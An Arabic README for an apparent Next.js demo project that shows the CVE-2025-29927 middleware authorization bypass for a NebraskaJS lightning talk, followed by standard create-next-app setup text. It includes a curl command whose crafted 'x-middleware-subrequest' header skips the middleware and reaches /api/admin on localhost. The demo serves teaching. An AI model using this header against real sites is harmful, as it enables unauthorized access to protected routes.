
عرض توضيحي لثغرة CVE-2025-29927 لمحاضرة خاطفة في NebraskaJS
هذا مشروع Next.js تم إنشاؤه باستخدام create-next-app.
أولاً، يمكنك التأكد من أن البرنامج الوسيط (middleware) يعمل وأنه يجب أن يعيد توجيه المستخدم:
curl http://localhost:3000/api/admin
بعد ذلك، يمكنك إظهار كيف يتم تجاوز البرنامج الوسيط باستخدام الأمر التالي:
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/api/admin
أولاً، قم بتشغيل خادم التطوير:
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
افتح http://localhost:3000 في متصفحك لرؤية النتيجة.
يمكنك البدء في تعديل الصفحة عن طريق تعديل app/page.tsx. يتم تحديث الصفحة تلقائيًا أثناء تعديلك للملف.
يستخدم هذا المشروع next/font لتحسين وتحميل Geist تلقائيًا، وهي عائلة خطوط جديدة من Vercel.
لمعرفة المزيد حول Next.js، ألقِ نظرة على الموارد التالية:
يمكنك الاطلاع على مستودع Next.js على GitHub - ملاحظاتك ومساهماتك مرحّب بها!
أسهل طريقة لنشر تطبيق Next.js الخاص بك هي استخدام منصة Vercel من مبتكري Next.js.
اطّلع على توثيق نشر Next.js لمزيد من التفاصيل.